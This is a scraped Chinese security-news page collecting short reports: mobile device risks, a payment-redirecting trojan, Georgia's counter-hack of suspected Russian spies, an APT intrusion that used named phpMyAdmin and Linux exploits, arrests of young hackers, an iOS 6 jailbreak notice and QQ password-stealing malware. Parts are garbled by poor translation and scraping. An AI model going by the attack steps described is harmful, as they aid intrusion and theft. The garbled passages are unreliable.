4、移动设备可能含有恶意软件。消费者可以下载包含恶意软件的应用程序。消费者在不知不觉中下载恶意软件,因为它可以伪装成一个游戏,安全补丁,实用工具,或其他有用的应用程序。用户告诉一个合法的应用程序和一个包含恶意软件的区别是很困难的。例如,一个应用程序可能会重新包装的恶意软件,消费者可能会不小心下载到移动设备上。数据可以很容易被截获。  5、移动设备通常不使用安全软件。许多移动设备不来预先安装了安全软件,以防止恶意程序,间谍软件和恶意软件的攻击。此外,用户并不总是安装安全软件,部分原因是因为移动设备往往进行安全软件预装。虽然这种软件可能会影响操作,但如果不安装安全软件,攻击者可以成功地散布恶意软件,如病毒,木马,间谍软件,垃圾邮件,引诱用户透露密码或其他机密信息。  6、修复系统可能是废弃的。移动设备的操作系统的安全补丁或修复程序不一定会安装在移动设备上及时。可能需要几周到几个月前的安全更新提供给消费者的设备。根据不同性质的漏洞,打补丁的过程可能是复杂的,涉及到很多人。例如,谷歌开发的Andr??oid OS更新修复安全漏洞,但它是由设备制造商生产设备特定的更新将漏洞修复,这可能需要时间,如果有修改设备的软件是专有的。一旦制造商生产的更新,它是由每个运营商进行测试,并更新传输到消费者的设备。然而,运营商可以提供更新的延迟,因为他们需要时间来检验他们是否干扰的设备或软件安装在其他方面。  此外,超过两年的移动设备可能无法接收安全更新,因为制造商可能不再支持这些设备。许多制造商在12个月至18个月后可能停止支持智能手机更新补丁。  7、在移动设备上的软件是最新的。第三方应用程序的安全补丁并不总是及时制定和发布的。另外,手机的第三方应用程序,包括Web浏览器,当有可用的更新,一般不告知消费者的。就如同与传统的Web浏览器,手机浏览器很少得到更新。使用过时的软件,攻击者可以利用漏洞与这些设备相关的风险增加。  8、移动设备通常不限制互联网连接。许多移动设备没有防火墙来限制连接。当设备被连接到广域网络时,它使用通信端口与其他设备和互联网连接。黑客可以访问的移动设备通过一个不固定的端口。防火墙保护这些端口,并允许用户选择移动设备进入网络。没有防火墙,移动设备可以通过一个不安全的通讯端口进入网络,而入侵者可能能够获取敏感信息的设备和滥用。  9、移动设备可能有未经授权的修改。修改的移动装置,以消除其局限性,让消费者能够增加新的功能(称为&越狱&)的过程中改变了设备的安全性管理,并可能增加安全风险。越狱允许用户获得访问的装置,以便允许未授权的软件的功能和应用程序被安全。虽然有些用户可能越狱或铲除他们的移动设备上专门安装的安全性增强功能,如防火墙,其他人可能只是在寻找更便宜或更简单的方法,安装所需的应用程序。在后一种情况下,用户面临更大的安全风险,因为它们是制造商建立了绕过应用程序的审批过程,在这个过程中可能无意中安装恶意软件。此外,越狱的设备可能无法获得安全更新的通知,从制造商和用户保持最新软件和打补丁通知。  10、沟通渠道可能没有很好的安全性。有沟通渠道,如蓝牙通讯&,打开&或&发现&模式(这使得该装置可以看出这样的连接可以由其他具有蓝牙功能的设备),可能允许攻击者安装恶意软件,通过该连接,或暗中激活麦克风或摄像头窃听的用户。此外,使用不安全的公共无线互联网络或WiFi点,可能允许攻击者连接到该设备,并查看敏感信息。(责任编辑:小松)
网购7000元商品 0.1秒遭刷光2万多
订单金额69元,支付金额变成了30000元的网页。&  
&  成都市民吴先生网上购物,2万多元不翼而飞。  
&  华西都市报记者谭梦媛实习生李思佳摄影刘陈平  录像揭秘  在付款页面刚弹出时,显示过一次付款金额为30000元,但0.1秒后这个金额就消失了,恢复成准备购买的商品价格警方说法  民警怀疑受骗者电脑遭遇了木马病毒,在付款时付款金额和交易对象都被病毒篡改  在网上购买一款价值7000多元的单反镜头,付款后银行卡上2万多元余额全部不翼而飞&&家住成都市高新区天府大道18号的吴先生,在某著名网站购物时遭遇蹊跷骗局。而那一大笔真实的扣款金额会显示一瞬间,立刻跳转成与货物标价一致价格,过程只有0.1秒。  办案民警怀疑这是一种新型的木马病毒。而记者在受害者们集结成的一个QQ群看到,全国各地有100多人遭遇类似骗局,且&冤枉钱&都被打进了同一家游戏公司。一位四川泸州的周女士被骗近7万元。  网购遇骗局2次付款失败2万元没了10月19日下午2点过,吴先生在家里的电脑上网购,拍下一款心仪已久的单反相机镜头,标价7000多元。随后,他通过网站专用支付软件页面进入网上银行付款。  吴先生说,在确认付款时,他两次输入密码,并通过&U盾&确认付款,但均提示系统繁忙。感觉蹊跷的他立即通过付款页面下的链接登录网上银行查询余额,发现2万多元余额全部不翼而飞!  焦急万分的他辗转前往开户银行查询,结果显示,他的钱全汇入了上海一游戏公司。他电话咨询该公司客服,工作人员告知,钱全部用来充值了游戏点卡,但不肯提供充值账号。  吴先生随即向高新区三瓦窑派出所报案,觉得这种新骗局实在是太&高明&。  录像来取证一个物品两个交易金额接下来一个多星期,吴先生一直与银行和收款的游戏公司保持联系,但事情没有进展。  &或许再演示一次能看出问题。&10月28日,吴先生灵机一动,开始做起了&实验&。他在网上拍下一件价值69元的衣服,采取与上次购物同样的步骤付款,并对全过程进行了录像。  在反复看过10遍以上录像后,他终于发现了问题。昨日,吴先生一边给记者指认录像,一边解释,整个录像大概2分50秒。记者注意到,他通过支付软件进入到付款页面,随后进入网银付款页面。输入银行卡号、输入登录密码和验证码之后,需要确认金额,这时交易页面会出现两次交易金额提示。网页左边提示订单金额为69元,右侧支付页面也同样会提示付款金额为69元,看起来是一致的。  问题就出在这里!将此段录像反复播放就会发现,其实在付款页面刚刚弹出时,显示过一次付款金额为30000元,但0.1秒之后,这个金额就消失了,取而代之的是与预备购买的商品价格一致的金额。  &我跟购物网站客服确认过了,进入网银的支付页面链接是正规的。&吴先生说,他仔细比对了网银的链接,也是真实的。&反复研究录像之后,发现网页左下角出现过可疑的跳转,但还没有查清楚到底为何。&吴先生说,里面有几个可疑之处,但还未找到全部原因。  百人已遭殃民警称是罕见的新骗局吴先生说,高新区公安分局网监大队已受理此案。办案民警称,这是一种目前比较罕见的新骗局,此前并未接到过类似报案,怀疑受骗者的电脑遭遇了木马病毒,在付款时,付款金额和交易对象都被病毒篡改。目前警方正在调查此案。  昨日,记者加入了一个名叫&上海&&网络诈骗受害&的QQ群,来自全国各地的100名群成员已满员,群主已建起了第二个群。在群里,网友&蓝色意大利&告诉记者,他们都是在网络上购物时被骗,被骗的情况,大部分与吴先生相似。还有一些是在用网银充值,或者还信用卡贷款时,付款金额和交易对象被篡改,都是进的同一家游戏公司账户。  &大家是为了维权,才聚在一起的。&吴先生说,群成员还制作了一张表格,统计了受骗者的信息,包括真实姓名、被骗金额、地址和联系电话。记者看到,登记金额中最大一笔是90000元,被骗者是重庆一位姓胡的人士,不过他电话无法接通。其中,四川共有5人被骗,其中3人是成都人。  在泸州的周女士也遭遇了类似骗局。今年4月,她在网上购买了一套价值3000多元的餐具和电视柜。付款后两天,一名自称是卖家客服的男子打电话给她,称之前的支付有问题,需要退款后重新支付。  &他用"订单客服"的账号加了我,然后传了一个退款链接给我。&周女士说,她打开链接,显示退款成功。在重新支付时,支付金额显示的0元,但当她输入密码确认支付后,查询发现,卡上69000多元余额不翼而飞。周女士的儿子帮她索要回了家具的款项,同时查询到,被骗走的钱进入了上海某游戏公司账户。  昨晚7点过,记者拨通了上海该游戏公司的客服电话,在说明来意后,一名工作人员称电话为实名转接,无法提供公司相关负责人电话。提示  两处没留意 给骗子可乘之机1、&在网购时,有人传照片给我,让我看看货,我打开一看是个exe.的执行文件,马上就删掉了。&吴先生怀疑问题就出在这里,而群里不少成员也称遇到过类似情况。  2、有液晶显示屏的U盾其实会显示实际交易金额,但是吴先生当时根本未留意,只是一直注视着电脑页面(责任编辑:小松)
反击!格鲁吉亚政府控制俄罗斯间谍的电脑
在看这篇新闻之前,我们先简单了解一下俄罗斯与格鲁吉亚之间的故事:  日起,格鲁吉亚和俄罗斯为了争夺南奥塞梯的控制权而爆发了战争。在国际各方的调停下,格鲁吉亚和俄罗斯分别于15日和16日在停火协议上签字,俄军于18日开始撤离格鲁吉亚,战争结束,一直以来,两个国家都有着各种纠纷,该地区局势也不明朗。  值得关注的是,俄罗斯以前不太重视的网络攻击也十分有效。在俄格战争全面爆发前的7月20日前后,大量标有&win+love+in+Russia&字样的数据包突然涌向格鲁吉亚政府网站并使其完全瘫痪。总统萨卡什维利的照片被换成了希特勒的,格总统府网站整整瘫痪了24小时。当俄军对格鲁吉亚的军事行动全面开始后,俄罗斯对格鲁吉亚的网络攻击也全面展开,包括媒体、通信和交通运输系统在内的格鲁吉亚官方网站都被瘫痪,对格军事行动造成了较大的影响,直接影响到了格鲁吉亚的战争动员与支援能力。  日前,格鲁吉亚政府发布一份长达27页的报告,其中详细说明了从2011年开始,疑似俄罗斯黑客攻击格鲁吉亚的新闻网站,传播恶意软件,劫持受感染的计算机、搜索敏感的主机。除了盗取敏感的信息之外,利用的恶意软件并且具备了远控一般的功能,如截图、监控摄像头、窃听通话等。  据格鲁吉亚攻击指挥与控制中心报告分析显示,至少390台电脑被感染,70%集中在佐治亚州,攻击主要针对政府机构、银行和重要的基础设施。
  反击:  格鲁吉亚的CERT在受感染的电脑上安装了一个ZIP包,其中包含了恶意程序,文件名为&格鲁吉亚与北约协议&,黑客发现之后果然拷走了该文件,在没有任何安全措施的情况下运行了该软件,研究人员立即控制了的电脑,下图为捕捉到的黑客嫌疑人头像:  
&  据格鲁吉亚政府透露,一名攻击者的IP显示在俄罗斯的莫斯科内务部物流部门,这恰好接近俄罗斯联邦国家安全局(FSB),这当中玄机不可而知。  
&  注:俄罗斯联邦国家安全局  俄罗斯联邦安全局(FSB)最主要负责俄罗斯国内事务。可以指挥国内军队、俄罗斯特种部队的分遣队或是大规模的市民情报网。FSB的人事预算则是国家机密,有报道指出2006年时预算就占了全部的40%左右。  FSB结构如下:  反情报安全部门  军事反情报理事会  经济安全部门  反恐怖主义与维护宪法系统安全部门  恐怖主义与极端政治控制安全理事会  行动资讯与国际情势安全部门(情势分析、情势预测、战略策划)  人事与认证部门  行动供应部门  国境守卫安全部门  控制安全部门  检验理事会  内部安全理事会  化学工程安全部门  研究调查理事会  另附上俄罗斯与格鲁吉亚的军力对比表:  俄罗斯 格鲁吉亚  部队总数 --124万 -----1.8万  坦克 ---2.28万辆 -----170辆  装甲车 --1.5万辆 -----120辆  战机 -----1390架 ------10架  直升机 ---2565架 ------11架  火炮 ----2.4万台 -----100台(责任编辑:小松)
迈阿密黑客防范论坛:APT威胁受关注
在本周的迈阿密防范论坛上,安全研究人员表示,黑客们正明目张胆地侵入公司网络,以窃取有价值的数据,并将其提供给其他公司或国家&&并侥幸逃脱。  &不幸的是,IDS(入侵检测系统)没有检测到他们&,瑞士的Ptrace Security公司的安全专家Gianni Gnesa在谈到最近一次针对瑞士公司的攻击时表示。  攻击者一旦进入员工机器,就会利用一系列工具和嗅探器来寻找存储在瑞士公司网络的有价值的内容。尽管他即便发现应用服务器也无法进入,但是,攻击者会攻入网络打印机,并查找密码。&管理员密码在HTML代码中,&Gnesa表示,&但不幸的是,那个密码也用在其他机器上。&  最后,攻击者会设法获取存储在Linux文件服务器上的文件、图表及其他有价值的知识产权。尽管服务器在安全防护上没有问题,但其备份可不是这样,通过Gnesa所说的phpMyAdmin 3.4.1 swekey RCE漏洞,攻击者可获得备份服务器上的远程操作界面。而通过使用另一个Linux 2.6.x umount漏洞,他会获得root shell,由此得以进入每个文件和目录。  Gnesa说,攻击者对提取大量敏感数据很有兴趣,他们将数据传送到马来西亚的受控主机上。攻击者在窃取签名信息和文件后,试图将金钱转入国外银行账号时,瑞士公司发现了不对劲。而瑞士银行认为这笔转账业务可疑并通知了受攻击的公司。Gnesa称,这次攻击花了2周时间来实现,但却花了一个半月时间来准备各种细节。  如何防止这类攻击以免数据遭窃?Gnesa建议,主要的措施就是使用安全事件和信息管理工具,如:HP ArcSight、Novell Sentinel、Tripwire Log Center和Splunk,由此监控不正常的流量。  &如果攻击者想进入你的网络,& Gnesa说,&你唯一能做的事就是给他制造更大的难度。&  上文中的瑞士公司在完成对此次攻击的调查后也做了些改变,比如:添加了单独的安全响应措施,禁止使用社交网络,改变网络拓扑结构等。  这种攻击窃取来的重要文件和信息经常被提供给竞争对手或者是国家机构,这就是现在常说的&高级持续性威胁(APT)&。在本次防范论坛上,其他安全专家也表示,他们也表示,有证据表明,APT一直都存在。(责任编辑:小松)
重庆男为报复学黑客攻击网站敛财被抓
 (重庆晨网记者 谭遥 通讯员 陈俊强 10月31日13:23报道)玩网络游戏,因为技术太差,被其他玩家骂为&菜鸟&,22岁的李立(化名)很不服气,于是在家自学成才,利用木马攻击入侵网站上千个,并获取这些网站的控制权,再将网站控制权限转卖给第三方从中获利2万余元。近日,万盛经开区警方破获辖区首例非法控制计算机信息系统案,犯罪嫌疑人李立已被警方刑事拘留。
  玩网游被骂不服气  年轻的小伙子李立(花名)初中毕业之后就到重庆主城打工,先在一网吧上班,并掌握了基本电脑知识,之后在一齿轮工厂当车工,因受不了苦,就放弃工作。  2010年6月,李立回到万盛家中,他整天沉迷于&劲舞团&游戏中,但因自己技术不好,经常在与其他玩家的对战中落败,被人骂为&菜鸟&。  争强好胜的李立就那开始就苦练&本领&,可是后来他从网上发现了在游戏中取胜的另一种途径。他在一次偶然机会,看到网上有专门教人攻击网站的内容,因此兴奋不已。  自学成来赚钱  李立勤学苦练,迅速掌握了基本攻击技术,并运用于&劲舞团&游戏中,他将自己游戏中的人物装备通过非法技术加上&外挂&轻松击败了对手,获胜后,李立心里非常满足。  在尝到&甜头&之后,李立继续钻研攻击网站技术,直到2011年1月,他已经可以成熟运用技术攻击他人网站,接着购置了两台攻击器软件、租用了三台软件服务器(外地)。2011年8月开始独立接单盈利并在贴吧发布广告称:&承接用技术攻击他人网站的业务&。很快就有各种人通过QQ联系上他,叫他帮忙攻击他人网站。  今年6月,有买家下订单要求攻击指定15个网站。李立通过技术运用木马文件连续20多天攻击了指定15个网站,造成网站网络堵塞无法连网,继而掌握了这些网站的控制权限,再将网站控制权限转交给买家,此次从中获利12000元。  在家中被民警抓获  今年10月8日,万盛经开区警方接信息,立即核查一涉案的QQ号码。在侦查过程中,民警发现了该QQ号作案的痕迹,通过进一步摸排调查掌握了嫌疑人李立的基本犯罪事实。28日早晨7点,万盛警方通过布控最终在南桐镇李立家中将其成功抓获,当场在其卧室查获涉案电脑、U盘、银行卡等赃物。  目前,此案还在进一步侦办中(责任编辑:小松)
Dev Team黑客团队正式公布iOS 6的完美越狱
 今天对于苹果用户来说绝对是好消息,iOS黑客团队Dev Team团队今天正式公布了iOS 6的完美越狱。此次完美越狱还加入了new iPad等设备,同时3GS也可以完成越狱,下面是完整的iOS 6支持列表:  iPhone 3GS  iPhone 4GSM Model  iphone 4  iphone 4S  iPhone 5  iPod Touch 3rd generation  iPod Touch 4th generation  iPad  iPad 2  iPad Mini  New Ipad  向导和更新步骤:  步骤1:访问:/  
&  步骤2:下载Verification System系统的最新工具  
&  步骤3:将iOS 6越狱工具保存到桌面并运行,根据向导然后进入DFU模式  
&  步骤4:之后就点击按钮等待最终越狱的成功  步骤5:完成了iPhone & iPad & iPad 的固件iOS 6.0将完成越狱  Windows平台步骤视频如下:
小心QQ粘虫病毒借美女图片偷QQ号
网友小强在QQ聊天时,突然收到女同学发来的消息&这是我最近新拍的照片,发给你看看&。小强经常和这位同学聊天,就没加思索的打开了这些&相册&文件,发现根本不是同学照片。很快,他看到QQ在其他地方登录成功的消息,他明白电脑中毒被盗号了
图1 伪装成相册的&QQ粘虫&病毒&金山毒霸安全中心分析了小强在论坛求助贴中上传的样本,发现这是个典型的QQ粘虫病毒。云安全系统统计,这个最新的QQ粘虫变种每天感染约6000台计算机,目前还不清楚有多少个QQ号被盗取。&如果在聊天过程中不小心接收了对方发送的&相册&文件,双击之后,病毒就会伪造QQ登录界面,当QQ下线重新登录时,网民会在病毒伪装的登录窗口中输入自己的QQ号和密码,病毒再悄无声息的将偷来的帐号发送到远程服务器。
图2 QQ粘虫伪造的QQ登录窗口,特点是虚拟键盘点击无效&金山毒霸安全专家建议网友聊天接收对方文件时,注意看一下文件的扩展名。如果对方发送的是exe后辍的可执行文件,并且劝你将.重命名删除后运行,务必不要上当。如果发现自己的QQ出现异常登录提示,应该尽快联系QQ客服找回帐号。并同时通知好友不要相信QQ借钱,因小偷会假冒你的身份去欺骗你的好友。
通州八通网遭群发遍布招嫖信息
本报讯(实习记者 董振杰)&八通网一打开全是招嫖信息,这要是孩子看了该怎么办呀?&昨晚8时许,通州市民杨女士惊讶地发现,通州知名社区网站八通网的一个栏目,链接的帖子全是招嫖信息。
  杨女士住在通州大方居,经常上八通网浏览帖子,以了解通州社区周边的方方面面,可是昨晚的浏览,真的吓了她一跳。
  记者昨晚8时30分登录八通网发现,在&百姓热线&一栏,所出现的帖子全是招嫖信息,并配有不雅图片及联系方式。这些帖子全是由一个署名为&羽毛球S&的人贴出。
  至昨晚9时30分,网络恢复正常,各个栏目已经可以正常登录。
  网站回应
  今天上午,八通网一名工作人员告诉记者,昨天晚上确实出现了网站被黑的情况。经常有人在周末或放假时段的晚上,利用发帖机发布招嫖信息,编辑发现了都会立即进行处理。昨晚的情况是因为正值放假期间,不法分子利用这个时段钻了空子。
  对攻击的情况,现在还无法避免。不过,工作人员发现后,已经第一时间进行了删除
17岁黑客看别人不能上网很爽攻击两家网吧
通讯员吕笑 记者徐贤康播报
  5月10日以来,永康金手指网吧李老板发现,网吧经常无缘无故断网,特别是在黄金时段,一断就是一两个小时。
  碰到这种事,顾客很恼火,都要退钱走人,可连顾客上网计时的软件也瘫痪了,李老板也不知道顾客到底上了多久,最后就收他们2元起价费。
  刚开始,李老板以为是路由器有问题,换了一个,还是老样子,他又找来网络维护公司,但断网依旧,电信公司的检查显示,网络是正常的。
  不只是金手指网吧,附近另一家网吧也是如此,两家老板都在头痛,会不会是有人故意破坏?
  6月9日晚,李老板在网吧里转悠,角落里一个小伙子,引起他的注意。
  他用的那台电脑,显示的都是服务器、端口、数据等信息,他的QQ上还有攻击网吧、销售木马病毒这类消息。
  李老板感觉他很可疑,但又没证据,观察了几个小时后,才决定报警。
  原来,让网吧断网的,正是这个年轻人,他姓陈,17岁,江西人,他说自己是一个,去年5月到永康。
  陈某只有初中学历,但很聪明,曾经在温州一家电脑店打工,他和店老板学了很多东西,最擅长的就是攻击计算机网络。
  有了这个本事,陈某就想用来赚钱,在网上发布消息,承接此类业务,帮人攻击网络,还收了徒弟,赚了不少钱。
  一次,在网吧接生意的时候,正好边上有个男的,看到陈某这么厉害,羡慕得不得了,就说要跟他学,这让陈某很知足。
  攻击金手指网吧,只是陈某的一项娱乐,他说,每次自己要下机了,就攻击一下网吧,让别人都上不了网,这让他心里感觉很爽,很有成就感。
  陈某已被刑拘。
华科学生盗取学校证件照片建站“选美”
&一个个中意的姑娘就这么毁了,HUST FACEMASH已经快把我弄哭了!&6月17日,一名昵称为&吃百啊&的网友,在百度贴吧&华中科技大学&吧里发帖感叹。  南方都市报记者发现,,这个模仿了大型社交网站Facebook雏形的小网站,几天就成了华中科技大学里最火爆的民间网站,不过也因盗取学校HUB(华中科技大学公共信息服务平台)中的学生证件照片,被认为侵犯隐私,遭到不少学生谴责、投诉,甚至有人要求警方介入调查。
  随机挑两名女生&PK&  从域名到页面,的设计者丝毫不掩饰对facebook雏形的模仿,甚至在网站介绍的开头就引用了facebook创始人扎克伯格的一句话,因此有同学评论&完全是照搬Mark Zuckerburg的做法嘛&。  2004年,还在读书的扎克伯格黑掉了哈佛大学网站,盗取学校9座宿舍楼中所有学生的照片,搭建了网站,让其他学生在线对照片打分,以选出学校里人气最高的男生和女生。尽管很火,但这个网站很快就被校方关闭,扎克伯格也因为盗取图片而被留校察看。后来,他的这段经历通过电影《社交网络》而为人所熟知。  从域名到功能,都与相似。打开首页是随机挑选的两名华中科技大学女同学的证件照片。网站上的文字介绍说,&这是一个简单的游戏,点击照片,选择你更喜欢的华科妹纸。你更喜欢谁?&  网站还设计了一个排行榜的功能,列出10名最受欢迎的女同学和她所在的院系名。此外,网站还提供了一个查询功能,只要输入姓名,即可找到相应女生的证件照片。  在网站介绍中,匿名的设计者说,&我们想通过HUST FACEMASH提醒大家,学校网络系统的不完善是对学生隐私的不尊重与漠视。我们希望借此机会督促学校修复学生信息系统的漏洞,保护每一位同学的隐私。同时,尽快解决选课系统容易宕机,教育网接入不稳定、速度慢等诸多问题。&
  火速成为校园热门话题  这个网站,最早在6月17日被发现在新浪网的应用平台中出现,被删除之后,服务器转移到了美国。有网友在微博上说,&有人报了网警说肖像隐私泄露,结果说服务器在加州,网警貌似够不着。&  很快就在华科学生中流传开了,成为了很多学生网上讨论的话题。  华中科技大学同济医学院的网友&doublex&,看过照片后在&起航同济&论坛中说,&真是毁人不倦啊!我的女神噢,就这样被摧毁了!&同校网友&佛爷&跟帖评论说:&排行榜建规学院的多啊,毕业前一定要去。&校友&初拥&也回帖:&你跟作者提下意见,让给弄个汉纸排行呗。&  网友&阳拉普达&在华中科技大学的贴吧中抱怨,&说实话,就HUB上那照片,现实中再漂亮的都毁了,搜了一个校花级的美女,那叫一个瞎眼啊。&一同抱怨的还有&wu9215&,他说,&我大机械为啥连个6分的都没有?&网友&此ID未审查通过&则评论说,&人类已经无法阻止我们看华科妹子的素颜照了。&
  有女生要求关闭网站  同时,也有很多学生对此表示愤怒。  &梨涡浅笑cl&就在一个评论照片的帖子后留言,&第二个是我舍友闺蜜,怎么可以随便不经别人同意搞照片呢?&有一名华中科技大学女生还按网站上留下的gmail邮箱,给网站设计者写了一封邮件,在邮件中她说,因为自己的照片、名字、学院出现在网站中,她的第一反应是恐惧。她认为,网站自称的提醒校园网修补漏洞只是托辞,目的其实是展示女生的照片,&谨以个人身份,恳请你们尽快关闭这个网站,好吗?&  华中科技大学人文学院教师夏增民,也批评这个网站的设计者是绑架学生信息、转移视线。  南都记者按照域名注册邮箱和网站公布的邮箱,分别给设计者发去采访邮件,但并未得到回应。  南都记者 张书舟 实习生 王银超 杨锋
3351人关注
3351人关注
站长在关注

我要回帖

更多关于 一站到底 江苏卫视 的文章

 

随机推荐